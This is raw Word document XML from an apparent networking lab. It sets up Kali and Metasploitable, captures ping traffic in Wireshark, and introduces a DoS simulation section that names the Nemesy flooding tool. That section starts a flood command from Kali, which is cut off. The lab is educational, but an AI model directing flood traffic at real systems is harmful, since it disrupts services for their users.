                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>224552</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5733415" cy="203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935B9" id="Group 38" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:17.7pt;width:451.45pt;height:1.6pt;z-index:-2516500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&#10;">
                <v:shape id="Graphic 3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GG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YwSOH5Jf4AOX0AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATZMhh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6URxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gpeiu5GpdjoGtRSKCjYavH8zL4mwezbkN1q+u+7gtDjMDPfMPOss7W4UOsrxxqSoQJB&#10;nDtTcaHh6/A2mILwAdlg7Zg0/JKHbNF7mGNq3JU/6bIPhYgQ9ilqKENoUil9XpJFP3QNcfS+XWsx&#10;RNkW0rR4jXBby5FSz9JixXGhxIbWJeXn/Y/VMOZus3o9Pr0sxye12x23+Yeiqdb9x245AxGoC//h&#10;e/vdaJgkcPsSf4Bc/AEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDla6U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6r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 4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rQwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARva2rxH9UooihelsWqeH00z7bYvJQmav32ZmHB4zAzv2Hmy9ZU4kGNKy0rGPQjEMSZ&#10;1SXnCk7H7fcUhPPIGivLpOBFDpaLztccE22ffKBH6nMRIOwSVFB4XydSuqwgg65va+LgXW1j0AfZ&#10;5FI3+AxwU8k4isbSYMlhocCa1gVlt/RuFKST7JKa8240nla/kzXb2P1sYqV63XY1A+Gp9Z/wf3uv&#10;FQyH8Pcl/AC5eAMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCeF5rQ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96B856" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="44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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A9DA0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Traffic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Capture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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDC98F" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5A42E5" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC54421" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="415" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5059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Find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2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Address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of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Both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Machines </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3600F" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="448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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6418F085" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="508"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note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(example: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192.168.56.101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD00CB0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 xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="678384C4" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="448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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B894253" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="508"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-3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(example: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192.168.56.102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC22BF1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031C8277" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="130"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C5AE66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Check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Network </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C06E79" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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From </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725B0C9E" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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ping </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A00028F" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="508" w:right="5559"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If replies come → Network is working If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not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Fix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before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proceeding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6EF6D9" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="159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Press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CTRL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+ C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to stop </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0500C6F1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09DCB271" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B656F0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Start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Wireshark on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Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583236BD" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr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wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="196ACCC0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313D9E4B" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="130"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EE7419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Select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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE89630" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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Choose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eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED65E45" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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Start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Capturing</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB44B2" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="503"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Wireshark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now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listening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traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40B883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10F34A97" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="6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Generate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Normal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Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608143E4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From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(new</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A167524" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="204" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="6661"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ping &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; Let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it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run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10–15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seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98D4D3" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="206"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D4842B" w14:textId="77777777" w:rsidR="00EF1DA9" w:rsidRDefault="00EF1DA9" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442967F6" w14:textId="3DD5A2D4" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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lastRenderedPageBreak/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Stop</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038622E2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Go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back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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4FBC3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b/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(Red</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Square)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B4282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7DE32075" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D61214B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Analyze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Normal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Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246E63A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In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Wireshark,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observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB30CF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Source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IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438C6B10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Destination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IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF413EF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Protocol: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ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AADB0D6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line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5941" w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Packet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rate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(slow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steady) Apply filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3465C2B5" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7967"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Observation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB5FBD" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="exac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Packets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evenly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spaced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responds </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4A229" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208DEA32" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="448" w:right="3286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B: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DoS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Attack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Analysis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(Learning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&amp;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Simulation) </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Important!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E37D5" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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We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NOT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launching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real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attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90E502" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="43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We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simulate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DoS-like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traffic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understand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its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impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE56AB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643FA8E6" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1319E9A9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</w:p>
    <w:p w14:paraId="793F6408" w14:textId="3CE40829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8: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Understand</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nemesy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Concept)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED7701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Nemesy</w:t>
      </w:r>
      <w:proofErr w:type="spell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tool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used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to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB0AA7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Generate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excessive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traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D45F5D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Simulate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flooding </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546A0676" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0286BF41" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Test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how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behave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under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stress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0663C0B0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3BE3C987" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="133"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB7033F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9: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Simulate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DoS-Like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Traffic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(Safe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Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04044FD2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From </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476ED27" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
